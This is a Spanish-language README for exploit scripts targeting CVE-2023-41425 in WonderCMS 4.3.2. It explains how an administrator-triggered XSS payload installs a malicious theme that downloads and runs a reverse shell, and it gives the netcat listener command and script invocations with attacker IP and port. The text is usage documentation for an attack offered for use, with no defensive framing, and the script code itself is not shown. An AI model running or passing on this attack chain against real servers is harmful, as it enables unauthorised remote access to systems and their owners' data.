
CVE-2023-41425 Reacondicionar
Estos scripts explotan una vulnerabilidad XSS (Cross-Site Scripting) en WonderCMS 4.3.2 para lograr Ejecución Remota de Código (RCE). El payload XSS, cuando es activado por el administrador, instala automáticamente una reverse shell en el servidor objetivo aprovechando un módulo de tema malicioso diseñado. La reverse shell se obtiene de revshells.com y se ejecuta, otorgando al atacante acceso remoto al servidor.
Para ejecutar con éxito cualquiera de los scripts, se requieren las siguientes herramientas y condiciones:
Pasted image 20241010021603
Esta versión del exploit verifica automáticamente si hay un listener nc activo, descarga la reverse shell, inicia el servidor HTTP, envía el payload y espera a que el administrador active la reverse shell.
nc esté ejecutándose en el puerto especificado:
nc -nvlp <PORT>
./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
revshells.com.Pasted image 20241010013048
Usa el exploit proporcionado por el script en el campo Website...
Pasted image 20241010013218
Esta versión requiere que el usuario administre manualmente el listener nc y la activación del payload XSS. Es más adecuada para escenarios donde los procesos automáticos no son deseables.
nc esté ejecutándose en el puerto especificado:
nc -nvlp <PORT>
./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
revshells.com.